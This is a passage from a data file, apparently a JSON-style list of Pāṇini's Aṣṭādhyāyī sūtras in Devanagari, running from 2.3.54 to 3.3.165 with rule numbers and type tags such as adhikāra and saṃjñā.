प्रतियत्ने","2.3.54::रुजार्थानां भाववचनानामज्वरेः","2.3.55::आशिषि नाथः","2.3.56::जासिनिप्रहणनाटक्राथपिषां हिंसायाम्","2.3.57::व्यवहृपणोः समर्थयोः","2.3.58::दिवस्तदर्थस्य","2.3.59::विभाषोपसर्गे","2.3.60::द्वितीया ब्राह्मणे","2.3.61::प्रेष्यब्रुवोर्हविषो देवतासम्प्रदाने","2.3.62::चतुर्थ्यर्थे बहुलं छन्दसि","2.3.63::यजेश्च करणे","2.3.64::कृत्वोऽर्थप्रयोगे कालेऽधिकरणे","2.3.65::कर्तृकर्मणोः कृति","2.3.66::उभयप्राप्तौ कर्मणि","2.3.67::क्तस्य च वर्तमाने","2.3.68::अधिकरणवाचिनश्च","2.3.69::न लोकाव्ययनिष्ठाखलर्थतृनाम्","2.3.70::अकेनोर्भविष्यदाधमर्ण्ययोः","2.3.71::कृत्यानां कर्तरि वा","2.3.72::तुल्यार्थैरतुलोपमाभ्यां तृतीयाऽन्यतरस्याम्","2.3.73::चतुर्थी चाशिष्यायुष्यमद्रभद्रकुशलसुखार्थहितैः","2.4.1:अतिदेशः:द्विगुरेकवचनम्","2.4.2::द्वंद्वश्च प्राणितूर्यसेनाङ्गानाम्","2.4.3::अनुवादे चरणानाम्","2.4.4::अध्वर्युक्रतुरनपुंसकम्.","2.4.5::अध्ययनतोऽविप्रकृष्टाख्यानाम्","2.4.6::जातिरप्राणिनाम्","2.4.7::विशिष्टलिङ्गो नदी देशोऽग्रामाः","2.4.8::क्षुद्रजन्तवः","2.4.9::येषां च विरोधः शाश्वतिकः","2.4.10::शूद्राणामनिरवसितानाम्","2.4.11::गवाश्वप्रभृतीनि च","2.4.12::विभाषा वृक्षमृगतृणधान्यव्यञ्जनपशुशकुन्यश्ववडवपूर्वापराधरोत्तराणाम्","2.4.13::विप्रतिषिद्धं चानधिकरणवाचि","2.4.14::न दधिपयआदीनि","2.4.15::अधिकरणैतावत्त्वे च","2.4.16::विभाषा समीपे","2.4.17::स नपुंसकम्","2.4.18::अव्ययीभावश्च","2.4.19:अधिकारः:तत्पुरुषोऽनञ् कर्मधारयः","2.4.20::संज्ञायां कन्थोशीनरेषु","2.4.21::उपज्ञोपक्रमं तदाद्याचिख्यासायाम्","2.4.22::छाया बाहुल्ये","2.4.23::सभा राजाऽमनुष्यपूर्वा","2.4.24::अशाला च","2.4.25::विभाषा सेनासुराछायाशालानिशानाम्","2.4.26:अतिदेशः:परवल्लिङ्गं द्वन्द्वतत्पुरुषयोः","2.4.27::पूर्ववदश्ववडवौ","2.4.28::हेमन्तशिशिरावहोरात्रे च च्छन्दसि","2.4.29::रात्राह्नाहाः पुंसि","2.4.30::अपथं नपुंसकम्","2.4.31::अर्धर्चाः पुंसि च","2.4.32::इदमोऽन्वादेशेऽशनुदात्तस्तृतीयाऽऽदौ","2.4.33::एतदस्त्रतसोस्त्रतसौ चानुदात्तौ","2.4.34::द्वितीयाटौस्स्वेनः","2.4.35:अधिकारः:आर्द्धधातुके","2.4.36::अदो जग्धिर्ल्यप्ति किति","2.4.37::लुङ्सनोर्घसॢ","2.4.38::घञपोश्च","2.4.39::बहुलं छन्दसि","2.4.40::लिट्यन्यतरस्याम्","2.4.41::वेञो वयिः","2.4.42::हनो वध लिङि","2.4.43::लुङि च","2.4.44::आत्मनेपदेष्वन्यतरस्याम्","2.4.45::इणो गा लुङि","2.4.46::णौ गमिरबोधने","2.4.47::सनि च","2.4.48::इङश्च","2.4.49::गाङ् लिटि","2.4.50::विभाषा लुङ्लृङोः","2.4.51::णौ च सँश्चङोः","2.4.52::अस्तेर्भूः","2.4.53::ब्रुवो वचिः","2.4.54::चक्षिङः ख्याञ्","2.4.55::वा लिटि","2.4.56::अजेर्व्यघञपोः","2.4.57::वा यौ","2.4.58::ण्यक्षत्रियार्षञितो यूनि लुगणिञोः","2.4.59::पैलादिभ्यश्च","2.4.60::इञः प्राचाम्","2.4.61::न तौल्वलिभ्यः","2.4.62::तद्राजस्य बहुषु तेनैवास्त्रियाम्","2.4.63::यस्कादिभ्यो गोत्रे","2.4.64::यञञोश्च","2.4.65::अत्रिभृगुकुत्सवसिष्ठगोतमाङ्गिरोभ्यश्च","2.4.66::बह्वचः इञः प्राच्यभरतेषु","2.4.67::न गोपवनादिभ्यः","2.4.68::तिककितवादिभ्यो द्वंद्वे","2.4.69::उपकादिभ्योऽन्यतरस्यामद्वंद्वे","2.4.70::आगस्त्यकौण्डिन्ययोरगस्तिकुण्डिनच्","2.4.71::सुपो धातुप्रातिपदिकयोः","2.4.72::अदिप्रभृतिभ्यः शपः","2.4.73::बहुलं छन्दसि","2.4.74::यङोऽचि च","2.4.75::जुहोत्यादिभ्यः श्लुः","2.4.76::बहुलं छन्दसि","2.4.77::गातिस्थाघुपाभूभ्यः सिचः परस्मैपदेषु","2.4.78::विभाषा घ्राधेट्शाच्छासः","2.4.79::तनादिभ्यस्तथासोः","2.4.80::मन्त्रे घसह्वरणशवृदहाद्वृच्कृगमिजनिभ्यो लेः","2.4.81::आमः","2.4.82::अव्ययादाप्सुपः","2.4.83::नाव्ययीभावादतोऽम्त्वपञ्चम्याः","2.4.84::तृतीयासप्तम्योर्बहुलम्","2.4.85::लुटः प्रथमस्य डारौरसः","3.1.1:संज्ञा; अधिकारः:प्रत्ययः","3.1.2:अधिकारः:परश्च","3.1.3::आद्युदात्तश्च","3.1.4::अनुदत्तौ सुप्पितौ","3.1.5::गुप्तिज्किद्भ्यः सन्","3.1.6::मान्बधदान्शान्भ्यो दीर्घश्चाभ्यासस्य","3.1.7::धातोः कर्मणः समानकर्तृकादिच्छायां वा","3.1.8::सुप आत्मनः क्यच्","3.1.9::काम्यच्च","3.1.10::उपमानादाचारे","3.1.11::कर्तुः क्यङ् सलोपश्च","3.1.12::भृशादिभ्यो भुव्यच्वेर्लोपश्च हलः","3.1.13::लोहितादिडाज्भ्यः क्यष्।","3.1.14::कष्टाय क्रमणे","3.1.15::कर्मणः रोमन्थतपोभ्यां वर्तिचरोः","3.1.16::बाष्पोष्माभ्यां उद्वमने","3.1.17::शब्दवैरकलहाभ्रकण्वमेघेभ्यः करणे","3.1.18::सुखादिभ्यः कर्तृवेदनायाम्","3.1.19::नमोवरिवश्चित्रङः क्यच्","3.1.20::पुच्छभाण्डचीवराण्णिङ्","3.1.21::मुण्डमिश्रश्लक्ष्णलवणव्रतवस्त्रहलकलकृततूस्तेभ्यो","3.1.22:अधिकारः:धातोरेकाचो हलादेः क्रियासमभिहारे यङ्","3.1.23::नित्यं कौटिल्ये गतौ","3.1.24::लुपसदचरजपजभदहदशगॄभ्यो भावगर्हायाम्","3.1.25::सत्यापपाशरूपवीणातूलश्लोकसेनालोमत्वचवर्मवर्णचूर्णचुरादिभ्यो णिच्","3.1.26::हेतुमति च","3.1.27::कण्ड्वादिभ्यो यक्","3.1.28::गुपूधूपविच्छिपणिपनिभ्य आयः","3.1.29::ऋतेरीयङ्","3.1.30::कमेर्णिङ्","3.1.31::आयादय आर्धद्धातुके वा","3.1.32:संज्ञा:सनाद्यन्ता धातवः","3.1.33::स्यतासी लृलुटोः","3.1.34::सिब्बहुलं लेटि","3.1.35::कास्प्रत्ययादाममन्त्रे लिटि","3.1.36::इजादेश्च गुरुमतोऽनृच्छः","3.1.37::दयायासश्च","3.1.38::उषविदजागृभ्योऽन्यतरस्याम्","3.1.39::भीह्रीभृहुवां श्लुवच्च","3.1.40::कृञ् चानुप्रयुज्यते लिटि","3.1.41::विदाङ्कुर्वन्त्वित्यन्यतरस्याम्","3.1.42::अभ्युत्सादयांप्रजनयांचिकयांरमयामकः","3.1.43::च्लि लुङि","3.1.44::च्लेः सिच्","3.1.45::शल इगुपधादनिटः क्सः","3.1.46::श्लिष आलिङ्गने","3.1.47::न दृशः","3.1.48::णिश्रिद्रुस्रुभ्यः कर्तरि चङ्","3.1.49::विभाषा धेट्श्व्योः","3.1.50::गुपेश्छन्दसि","3.1.51::नोनयतिध्वनयत्येलयत्यर्दयतिभ्यः","3.1.52::अस्यतिवक्तिख्यातिभ्यः अङ्","3.1.53::लिपिसिचिह्वश्च","3.1.54::आत्मनेपदेष्वन्यतरस्याम्","3.1.55::पुषादिद्युताद्यॢदितः परस्मैपदेषु","3.1.56::सर्त्तिशास्त्यर्तिभ्यश्च","3.1.57::इरितो वा","3.1.58::जृस्तम्भुम्रुचुम्लुचुग्रुचुग्लुचुग्लुञ्चुश्विभ्यश्च","3.1.59::कृमृदृरुहिभ्यश्छन्दसि","3.1.60::चिण् ते पदः","3.1.61::दीपजनबुधपूरितायिप्यायिभ्योऽन्यतरस्याम्","3.1.62::अचः कर्मकर्तरि","3.1.63::दुहश्च","3.1.64::न रुधः","3.1.65::तपोऽनुतापे च","3.1.66::चिण् भावकर्मणोः","3.1.67::सार्वधातुके यक्","3.1.68::कर्तरि शप्","3.1.69::दिवादिभ्यः श्यन्","3.1.70::वा भ्राशभ्लाशभ्रमुक्रमुक्लमुत्रसित्रुटिलषः","3.1.71::यसोऽनुपसर्गात्","3.1.72::संयसश्च","3.1.73::स्वादिभ्यः श्नुः","3.1.74::श्रुवः शृ च","3.1.75::अक्षोऽन्यतरस्याम्","3.1.76::तनूकरणे तक्षः","3.1.77::तुदादिभ्यः शः","3.1.78::रुधादिभ्यः श्नम्","3.1.79::तनादिकृञ्भ्य उः","3.1.80::धिन्विकृण्व्योर च","3.1.81::क्र्यादिभ्यः श्ना","3.1.82::स्तम्भुस्तुम्भुस्कम्भुस्कुम्भुस्कुञ्भ्यः श्नुश्च","3.1.83::हलः श्नः शानज्झौ","3.1.84::छन्दसि शायजपि","3.1.85::व्यत्ययो बहुलम्","3.1.86::लिङ्याशिष्यङ्","3.1.87:अतिदेशः:कर्मवत् कर्मणा तुल्यक्रियः","3.1.88::तपस्तपःकर्मकस्यैव","3.1.89::न दुहस्नुनमां यक्चिणौ","3.1.90::कुषिरजोः प्राचां श्यन् परस्मैपदं च","3.1.91:अधिकारः:धातोः","3.1.92:संज्ञा:तत्रोपपदं सप्तमीस्थम्","3.1.93:संज्ञा:कृदतिङ्","3.1.94:परिभाषा:वाऽसरूपोऽस्त्रियाम्","3.1.95:संज्ञा:कृत्याः प्राङ् ण्वुलः","3.1.96::तव्यत्तव्यानीयरः","3.1.97::अचो यत्","3.1.98::पोरदुपधात्","3.1.99::शकिसहोश्च","3.1.100::गदमदचरयमश्चानुपसर्गे","3.1.101::अवद्यपण्यवर्या गर्ह्यपणितव्यानिरोधेषु","3.1.102::वह्यं करणम्","3.1.103::अर्यः स्वामिवैश्ययोः","3.1.104::उपसर्या काल्या प्रजने","3.1.105::अजर्यं संगतम्","3.1.106::वदः सुपि क्यप् च","3.1.107::भुवो भावे","3.1.108::हनस्त च","3.1.109::एतिस्तुशस्वृदृजुषः क्यप्","3.1.110::ऋदुपधाच्चाकॢपिचृतेः","3.1.111::ई च खनः","3.1.112::भृञोऽसंज्ञायाम्","3.1.113::मृजेर्विभाषा","3.1.114::राजसूयसूर्यमृषोद्यरुच्यकुप्यकृष्टपच्याव्यथ्याः","3.1.115::भिद्योद्ध्यौ नदे","3.1.116::पुष्यसिद्ध्यौ नक्षत्रे","3.1.117::विपूयविनीयजित्या मुञ्जकल्कहलिषु","3.1.118::प्रत्यपिभ्यां ग्रहेश्छन्दसि","3.1.119::पदास्वैरिबाह्यापक्ष्येषु च","3.1.120::विभाषा कृवृषोः","3.1.121::युग्यं च पत्त्रे","3.1.122::अमावस्यदन्यतरस्याम्","3.1.123::छन्दसि निष्टर्क्यदेवहूयप्रणीयोन्नीयोच्छिष्य","3.1.124::ऋहलोर्ण्यत्","3.1.125::ओरावश्यके","3.1.126::आसुयुवपिरपिलपित्रपिचमश्च","3.1.127::आनाय्योऽनित्ये","3.1.128::प्रणाय्योऽसंमतौ","3.1.129::पाय्यसान्नाय्यनिकाय्यधाय्या मानहविर्निवाससामिधेनीषु","3.1.130::क्रतौ कुण्डपाय्यसंचाय्यौ","3.1.131::अग्नौ परिचाय्योपचाय्यसमूह्याः","3.1.132::चित्याग्निचित्ये च","3.1.133::ण्वुल्तृचौ","3.1.134::नन्दिग्रहिपचादिभ्यो ल्युणिन्यचः","3.1.135::इगुपधज्ञाप्रीकिरः कः","3.1.136::आतश्चोपसर्गे","3.1.137::पाघ्राध्माधेट्दृशः शः","3.1.138::अनुपसर्गाल्लिम्पविन्दधारिपारिवेद्युदेजिचेतिसातिसाहिभ्यश्च","3.1.139::ददातिदधात्योर्विभाषा","3.1.140::ज्वलितिकसन्तेभ्यो णः","3.1.141::श्याऽऽद्व्यधास्रुसंस्र्वतीणवसाऽवहृलिहश्लिषश्वसश्च","3.1.142::दुन्योरनुपसर्गे","3.1.143::विभाषा ग्रहेः","3.1.144::गेहे कः","3.1.145::शिल्पिनि ष्वुन्","3.1.146::गस्थकन्","3.1.147::ण्युट् च","3.1.148::हश्च व्रीहिकालयोः","3.1.149::प्रुसृल्वः समभिहारे वुन्","3.1.150::आशिषि च","3.2.1::कर्मण्यण्","3.2.2::ह्वावामश्च","3.2.3::आतोऽनुपसर्गे कः","3.2.4::सुपि स्थः","3.2.5::तुन्दशोकयोः परिमृजापनुदोः","3.2.6::प्रे दाज्ञः","3.2.7::समि ख्यः","3.2.8::गापोष्टक्","3.2.9::हरतेरनुद्यमनेऽच्","3.2.10::वयसि च","3.2.11::आङि ताच्छील्ये","3.2.12::अर्हः","3.2.13::स्तम्बकर्णयोः रमिजपोः","3.2.14::शमि धातोः संज्ञायाम्","3.2.15::अधिकरणे शेतेः","3.2.16::चरेष्टः","3.2.17::भिक्षासेनाऽऽदायेषु च","3.2.18::पुरोऽग्रतोऽग्रेषु सर्तेः","3.2.19::पूर्वे कर्तरि","3.2.20::कृञो हेतुताच्छील्यानुलोम्येषु","3.2.21::दिवाविभानिशाप्रभाभास्करान्तानन्तादिबहुनान्दीकिम्लिपिलिबिबलिभक्तिकर्तृचित्रक्षेत्रसंख्याजङ्घाबाह्वहर्यत्तत्धनुररुष्षु","3.2.22::कर्मणि भृतौ","3.2.23::न शब्दश्लोककलहगाथावैरचाटुसूत्रमन्त्रपदेषु","3.2.24::स्तम्बशकृतोरिन्","3.2.25::हरतेर्दृतिनाथयोः पशौ","3.2.26::फलेग्रहिरात्मम्भरिश्च","3.2.27::छन्दसि वनसनरक्षिमथाम्","3.2.28::एजेः खश्","3.2.29::नासिकास्तनयोर्ध्माधेटोः","3.2.30::नाडीमुष्ट्योश्च","3.2.31::उदि कूले रुजिवहोः","3.2.32::वहाभ्रे लिहः","3.2.33::परिमाणे पचः","3.2.34::मितनखे च","3.2.35::विध्वरुषोः तुदः","3.2.36::असूर्यललाटयोर्दृशितपोः","3.2.37::उग्रम्पश्येरम्मदपाणिन्धमाश्च","3.2.38::प्रियवशे वदः खच्","3.2.39::द्विषत्परयोस्तापेः","3.2.40::वाचि यमो व्रते","3.2.41::पूःसर्वयोर्दारिसहोः","3.2.42::सर्वकूलाभ्रकरीषेषु कषः","3.2.43::मेघर्तिभयेषु कृञः","3.2.44::क्षेमप्रियमद्रेऽण् च","3.2.45::आशिते भुवः करणभावयोः","3.2.46::संज्ञायां भृतॄवृजिधारिसहितपिदमः","3.2.47::गमश्च","3.2.48::अन्तात्यन्ताध्वदूरपारसर्वानन्तेषु डः","3.2.49::आशिषि हनः","3.2.50::अपे क्लेशतमसोः","3.2.51::कुमारशीर्षयोर्णिनिः","3.2.52::लक्षणे जायापत्योष्टक्","3.2.53::अमनुष्यकर्तृके च","3.2.54::शक्तौ हस्तिकपाटयोः","3.2.55::पाणिघताडघौ शिल्पिनि","3.2.56::आढ्यसुभगस्थूलपलितनग्नान्धप्रियेषु च्व्य्र्थेष्वच्वौ कृञः करणे ख्युन्","3.2.57::कर्तरि भुवः खिष्णुच्खुकञौ","3.2.58::स्पृशोऽनुदके क्विन्","3.2.59::ऋत्विग्दधृक्स्रग्दिगुष्णिगञ्चुयुजिक्रुञ्चां च","3.2.60::त्यदादिषु दृशोऽनालोचने कञ् च","3.2.61::सत्सूद्विषद्रुहदुहयुजविदभिदच्छिदजिनीराजामुपसर्गेऽपि क्विप्","3.2.62::भजो ण्विः","3.2.63::छन्दसि सहः","3.2.64::वहश्च","3.2.65::कव्यपुरीषपुरीष्येषु ञ्युट्","3.2.66::हव्येऽनन्तः पादम्","3.2.67::जनसनखनक्रमगमो विट्","3.2.68::अदोऽनन्ने","3.2.69::क्रव्ये च","3.2.70::दुहः कब् घश्च","3.2.71::मन्त्रे श्वेतवहौक्थशस्पुरोडाशो ण्विन्","3.2.72::अवे यजः","3.2.73::विजुपे छन्दसि","3.2.74::आतो मनिन्क्वनिप्वनिपश्च","3.2.75::अन्येभ्योऽपि दृश्यन्ते","3.2.76::क्विप् च","3.2.77::स्थः क च","3.2.78::सुप्यजातौ णिनिस्ताच्छिल्ये","3.2.79::कर्तर्युपमाने","3.2.80::व्रते","3.2.81::बहुलमाभीक्ष्ण्ये","3.2.82::मनः","3.2.83::आत्ममाने खश्च","3.2.84:अधिकारः:भूते","3.2.85::करणे यजः","3.2.86::कर्मणि हनः","3.2.87::ब्रह्मभ्रूणवृत्रेषु क्विप्","3.2.88::बहुलं छन्दसि","3.2.89::सुकर्मपापमन्त्रपुण्येषु कृञः","3.2.90::सोमे सुञः","3.2.91::अग्नौ चेः","3.2.92::कर्मण्यग्न्याख्यायाम्","3.2.93::कर्मणीनिर्विक्रियः","3.2.94::दृशेः क्वनिप्","3.2.95::राजनि युधिकृञः","3.2.96::सहे च","3.2.97::सप्तम्यां जनेर्डः","3.2.98::पञ्चम्यामजातौ","3.2.99::उपसर्गे च संज्ञायाम्","3.2.100::अनौ कर्मणि","3.2.101::अन्येष्वपि दृश्यते","3.2.102::निष्ठा","3.2.103::सुयजोर्ङ्वनिप्","3.2.104::जीर्यतेरतृन्","3.2.105::छन्दसि लिट्","3.2.106::लिटः कानज्वा","3.2.107::क्वसुश्च","3.2.108::भाषायां सदवसश्रुवः","3.2.109::उपेयिवाननाश्वाननूचानश्च","3.2.110::लुङ्","3.2.111::अनद्यतने लङ्","3.2.112::अभिज्ञावचने लृट्","3.2.113::न यदि","3.2.114::विभाषा साकाङ्क्षे","3.2.115::परोक्षे लिट्","3.2.116::हशश्वतोर्लङ् च","3.2.117::प्रश्ने चासन्नकाले","3.2.118::लट् स्मे","3.2.119::अपरोक्षे च","3.2.120::ननौ पृष्टप्रतिवचने","3.2.121::नन्वोर्विभाषा","3.2.122::पुरि लुङ् चास्मे","3.2.123:अधिकारः:वर्तमाने लट्","3.2.124::लटः शतृशानचावप्रथमासमानाधिकरणे","3.2.125::सम्बोधने च","3.2.126::लक्षणहेत्वोः क्रियायाः","3.2.127:संज्ञा:तौ सत्","3.2.128::पूङ्यजोः शानन्","3.2.129::ताच्छील्यवयोवचनशक्तिषु चानश्","3.2.130::इङ्धार्योः शत्रकृच्छ्रिणि","3.2.131::द्विषोऽमित्रे","3.2.132::सुञो यज्ञसंयोगे","3.2.133::अर्हः पूजायाम्","3.2.134:अधिकारः:आक्वेस्तच्छीलतद्धर्मतत्साधुकारिषु","3.2.135::तृन्","3.2.136::अलंकृञ्निराकृञ्प्रजनोत्पचोत्पतोन्मदरुच्यपत्रपवृतुवृधुसहचर इष्णुच्","3.2.137::णेश्छन्दसि","3.2.138::भुवश्च","3.2.139::ग्लाजिस्थश्च क्स्नुः","3.2.140::त्रसिगृधिधृषिक्षिपेः क्नुः","3.2.141::शमित्यष्टाभ्यो घिनुण्","3.2.142::संपृचानुरुधाङ्यमाङ्यसपरिसृसंसृजपरिदेविसंज्वरपरिक्षिपपरिरटपरिवदपरिदहपरिमुहदुषद्विषद्रुहदुहयुजाक्रीडविविचत्यजरजभजातिचरापचरामुषाभ्याहनश्च","3.2.143::वौ कषलसकत्थस्रम्भः","3.2.144::अपे च लषः","3.2.145::प्रे लपसृद्रुमथवदवसः","3.2.146::निन्दहिंसक्लिशखादविनाशपरिक्षिपपरिरटपरिवादिव्याभाषासूञो वुञ्","3.2.147::देविक्रुशोश्चोपसर्गे","3.2.148::चलनशब्दार्थादकर्मकाद्युच्","3.2.149::अनुदात्तेतश्च हलादेः","3.2.150::जुचङ्क्रम्यदन्द्रम्यसृगृधिज्वलशुचलषपतपदः","3.2.151::क्रुधमण्डार्थेभ्यश्च","3.2.152::न यः","3.2.153::सूददीपदीक्षश्च","3.2.154::लषपतपदस्थाभूवृषहनकमगमशॄभ्य उकञ्","3.2.155::जल्पभिक्षकुट्टलुण्टवृङः षाकन्","3.2.156::प्रजोरिनिः","3.2.157::जिदृक्षिविश्रीण्वमाव्यथाभ्यमपरिभूप्रसूभ्यश्च","3.2.158::स्पृहिगृहिपतिदयिनिद्रातन्द्राश्रद्धाभ्य आलुच्","3.2.159::दाधेट्सिशदसदो रुः","3.2.160::सृघस्यदः क्मरच्","3.2.161::भञ्जभासमिदो घुरच्","3.2.162::विदिभिदिच्छिदेः कुरच्","3.2.163::इण्नश्जिसर्त्तिभ्यः क्वरप्","3.2.164::गत्वरश्च","3.2.165::जागुरूकः","3.2.166::यजजपदशां यङः","3.2.167::नमिकम्पिस्म्यजसकमहिंसदीपो रः","3.2.168::सनाशंसभिक्ष उः","3.2.169::विन्दुरिच्छुः","3.2.170::क्याच्छन्दसि","3.2.171::आदृगमहनजनः किकिनौ लिट् च","3.2.172::स्वपितृषोर्नजिङ्","3.2.173::शॄवन्द्योरारुः","3.2.174::भियः क्रुक्लुकनौ","3.2.175::स्थेशभासपिसकसो वरच्","3.2.176::यश्च यङः","3.2.177::भ्राजभासधुर्विद्युतोर्जिपॄजुग्रावस्तुवः क्विप्","3.2.178::अन्येभ्योऽपि दृश्यते","3.2.179::भुवः संज्ञाऽन्तरयोः","3.2.180::विप्रसम्भ्यो ड्वसंज्ञायाम्","3.2.181::धः कर्मणि ष्ट्रन्","3.2.182::दाम्नीशसयुयुजस्तुतुदसिसिचमिहपतदशनहः करणे","3.2.183::हलसूकरयोः पुवः","3.2.184::अर्तिलूधूसूखनसहचर इत्रः","3.2.185::पुवः संज्ञायाम्","3.2.186::कर्तरि चर्षिदेवतयोः","3.2.187::ञीतः क्तः","3.2.188::मतिबुद्धिपूजार्थेभ्यश्च","3.3.1::उणादयो बहुलम्","3.3.2::भूतेऽपि दृश्यन्ते","3.3.3:अधिकारः:भविष्यति गम्यादयः","3.3.4::यावत्पुरानिपातयोर्लट्","3.3.5::विभाषा कदाकर्ह्योः","3.3.6::किंवृत्ते लिप्सायाम्","3.3.7::लिप्स्यमानसिद्धौ च","3.3.8::लोडर्थलक्षणे च","3.3.9::लिङ् चोर्ध्वमौहूर्तिके","3.3.10::तुमुन्ण्वुलौ क्रियायां क्रियार्थायाम्","3.3.11::भाववचनाश्च","3.3.12::अण् कर्मणि च","3.3.13::लृट् शेषे च","3.3.14::लृटः सद् वा","3.3.15::अनद्यतने लुट्","3.3.16::पदरुजविशस्पृशो घञ्","3.3.17::सृ स्थिरे","3.3.18:अधिकारः:भावे","3.3.19:अधिकारः:अकर्तरि च कारके संज्ञायाम्","3.3.20::परिमणाख्यायां सर्वेभ्यः","3.3.21::इङश्च","3.3.22::उपसर्गे रुवः","3.3.23::समि युद्रुदुवः","3.3.24::श्रिणीभुवोऽनुपसर्गे","3.3.25::वौ क्षुश्रुवः","3.3.26::अवोदोर्नियः","3.3.27::प्रे द्रुस्तुस्रुवः","3.3.28::निरभ्योः पूल्वोः","3.3.29::उन्न्योर्ग्रः","3.3.30::कॄ धान्ये","3.3.31::यज्ञे समि स्तुवः","3.3.32::प्रे स्त्रोऽयज्ञे","3.3.33::प्रथने वावशब्दे","3.3.34::छन्दोनाम्नि च","3.3.35::उदि ग्रहः","3.3.36::समि मुष्टौ","3.3.37::परिन्योर्नीणोर्द्यूताभ्रेषयोः","3.3.38::परावनुपात्यय इणः","3.3.39::व्युपयोः शेतेः पर्याये","3.3.40::हस्तादाने चेरस्तेये","3.3.41::निवासचितिशरीरोपसमाधानेष्वादेश्च कः","3.3.42::संघे चानौत्तराधर्ये","3.3.43::कर्मव्यतिहारे णच् स्त्रियाम्","3.3.44::अभिविधौ भाव इनुण्","3.3.45::आक्रोशेऽवन्योर्ग्रहः","3.3.46::प्रे लिप्सायाम्","3.3.47::परौ यज्ञे","3.3.48::नौ वृ धान्ये","3.3.49::उदि श्रयतियौतिपूद्रुवः","3.3.50::विभाषाऽऽङि रुप्लुवोः","3.3.51::अवे ग्रहो वर्षप्रतिबन्धे","3.3.52::प्रे वणिजाम्","3.3.53::रश्मौ च","3.3.54::वृणोतेराच्छादने","3.3.55::परौ भुवोऽवज्ञाने","3.3.56::एरच्","3.3.57::ऋदोरप्","3.3.58::ग्रहवृदृनिश्चिगमश्च","3.3.59::उपसर्गेऽदः","3.3.60::नौ ण च","3.3.61::व्यधजपोरनुपसर्गे","3.3.62::स्वनहसोर्वा","3.3.63::यमः समुपनिविषु","3.3.64::नौ गदनदपठस्वनः","3.3.65::क्वणो वीणायां च","3.3.66::नित्यं पणः परिमाणे","3.3.67::मदोऽनुपसर्गे","3.3.68::प्रमदसम्मदौ हर्षे","3.3.69::समुदोरजः पशुषु","3.3.70::अक्षेषु ग्लहः","3.3.71::प्रजने सर्तेः","3.3.72::ह्वः सम्प्रसारणं च न्यभ्युपविषु","3.3.73::आङि युद्धे","3.3.74::निपानमाहावः","3.3.75::भावेऽनुपसर्गस्य","3.3.76::हनश्च वधः","3.3.77::मूर्तौ घनः","3.3.78::अन्तर्घनो देशे","3.3.79::अगारैकदेशे प्रघणः प्रघाणश्च","3.3.80::उद्घनोऽत्याधानम्","3.3.81::अपघनोऽङ्गम्","3.3.82::करणेऽयोविद्रुषु","3.3.83::स्तम्बे क च","3.3.84::परौ घः","3.3.85::उपघ्न आश्रये","3.3.86::संघोद्घौ गणप्रशंसयोः","3.3.87::निघो निमितम्","3.3.88::ड्वितः क्त्रिः","3.3.89::ट्वितोऽथुच्","3.3.90::यजयाचयतविच्छप्रच्छरक्षो नङ्","3.3.91::स्वपो नन्","3.3.92::उपसर्गे घोः किः","3.3.93::कर्मण्यधिकरणे च","3.3.94:अधिकारः:स्त्रियां क्तिन्","3.3.95::स्थागापापचां भावे","3.3.96::मन्त्रे वृषेषपचमनविदभूवीरा उदात्तः","3.3.97::ऊतियूतिजूतिसातिहेतिकीर्तयश्च","3.3.98::व्रजयजोर्भावे क्यप्","3.3.99::संज्ञायां समजनिषदनिपतमनविदषुञ्शीङ्भृञिणः","3.3.100::कृञः श च","3.3.101::इच्छा","3.3.102::अ प्रत्ययात्","3.3.103::गुरोश्च हलः","3.3.104::षिद्भिदादिभ्योऽङ्","3.3.105::चिन्तिपूजिकथिकुम्बिचर्चश्च","3.3.106::आतश्चोपसर्गे","3.3.107::ण्यासश्रन्थो युच्","3.3.108::रोगाख्यायां ण्वुल् बहुलम्","3.3.109::संज्ञायाम्","3.3.110::विभाषाऽऽख्यानपरिप्रश्नयोरिञ् च","3.3.111::पर्यायार्हर्णोत्पत्तिषु ण्वुच्","3.3.112::आक्रोशे नञ्यनिः","3.3.113::कृत्यल्युटो बहुलम्","3.3.114::नपुंसके भावे क्तः","3.3.115::ल्युट् च","3.3.116::कर्मणि च येन संस्पर्शात् कर्तुः शरीरसुखम्","3.3.117:अधिकारः:करणाधिकरणयोश्च","3.3.118::पुंसि संज्ञायां घः प्रायेण","3.3.119::गोचरसंचरवहव्रजव्यजापणनिगमाश्च","3.3.120::अवे तॄस्त्रोर्घञ्","3.3.121::हलश्च","3.3.122::अध्यायन्यायोद्यावसंहाराधारावयाश्च","3.3.123::उदङ्कोऽनुदके","3.3.124::जालमानायः","3.3.125::खनो घ च","3.3.126::ईषद्दुःसुषु कृच्छ्राकृच्छ्रार्थेषु खल्","3.3.127::कर्तृकर्मणोश्च भूकृञोः","3.3.128::आतो युच्","3.3.129::छन्दसि गत्यर्थेभ्यः","3.3.130::अन्येभ्योऽपि दृश्यते","3.3.131:अतिदेशः:वर्तमानसामीप्ये वर्तमानवद्वा","3.3.132::आशंसायां भूतवच्च","3.3.133::क्षिप्रवचने लृट्","3.3.134::आशंसावचने लिङ्","3.3.135:अतिदेशः:नानद्यतनवत् क्रियाप्रबन्धसामीप्ययोः","3.3.136::भविष्यति मर्यादावचनेऽवरस्मिन्","3.3.137::कालविभागे चानहोरात्राणाम्","3.3.138::परस्मिन् विभाषा","3.3.139::लिङ्निमित्ते लृङ् क्रियाऽतिपत्तौ","3.3.140::भूते च","3.3.141::वोताप्योः","3.3.142::गर्हायां लडपिजात्वोः","3.3.143::विभाषा कथमि लिङ् च","3.3.144::किंवृत्ते लिङ्लृटौ","3.3.145::अनवकॢप्त्यमर्षयोरकिंवृत्ते अपि","3.3.146::किंकिलास्त्यर्थेषु लृट्","3.3.147::जातुयदोर्लिङ्","3.3.148::यच्चयत्रयोः","3.3.149::गर्हायां च","3.3.150::चित्रीकरणे च","3.3.151::शेषे लृडयदौ","3.3.152::उताप्योः समर्थयोर्लिङ्","3.3.153::कामप्रवेदनेऽकच्चिति","3.3.154::सम्भवानेऽलमिति चेत् सिद्धाप्रयोगे","3.3.155::विभाषा धातौ सम्भावनवचनेऽयदि","3.3.156::हेतुहेतुमतोर्लिङ्","3.3.157::इच्छार्थेषु लिङ्लोटौ","3.3.158::समानकर्तृकेषु तुमुन्","3.3.159::लिङ् च","3.3.160::इच्छार्थेभ्यो विभाषा वर्तमाने","3.3.161::विधिनिमन्त्रणामन्त्रणाधीष्टसंप्रश्नप्रार्थनेषु लिङ्","3.3.162::लोट् च","3.3.163::प्रैषातिसर्गप्राप्तकालेषु कृत्याश्च","3.3.164::लिङ् चोर्ध्वमौहूर्तिके","3.3.165::स्मे 